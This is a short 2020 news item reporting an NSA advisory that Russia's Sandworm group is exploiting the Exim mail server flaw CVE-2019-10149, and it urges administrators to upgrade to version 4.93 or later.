Russian Hacking Operation Underway

By

The NSA has warned the US government a hacking operation is targeting Linux operating systems used to manage infrastructure.

A Russian Hacking collective, known as the "Sandworm Team" (and part of GRU - The Main Directorate of the General Staff of the Armed Forces of the Russian Federation) have been using a special intrusion technique to gain "dream access" by adding privileged users, disable network security settings, update SSH configurations to enable remote access, and execute code that exploits network various vulnerabilities.

This is the same organization that targeted the 2016 United States presidential election, to steal emails from the Democratic National Convention and break into voter registration databases.
The target is the Exim mail transfer agent used on countless Linux and UNIX-based operating systems. The actors exploited Exim via the "MAIL FROM" field of the SMTP message. Once exploited, the actor could execute the code of their choosing. The particular vulnerability being exploited was actually patched on June 5, 2019 (CVE-2019-10149), but not all Linux administrators are as up to date on patches as they should be. The Exim developers urged all users to upgrade the software, and the NSA is now adding its own encouragement for administrators to immediately patch Exim to mitigate against this ongoing threat.

If your Linux mail server is running a version of Exim older than 4.93, you need to upgrade immediately.

Original source: https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA-Sandworm-Actors-Exploiting-Vulnerability-in-Exim-Transfer-Agent-20200528.pdf

06/01/2020

Related content

comments powered by Disqus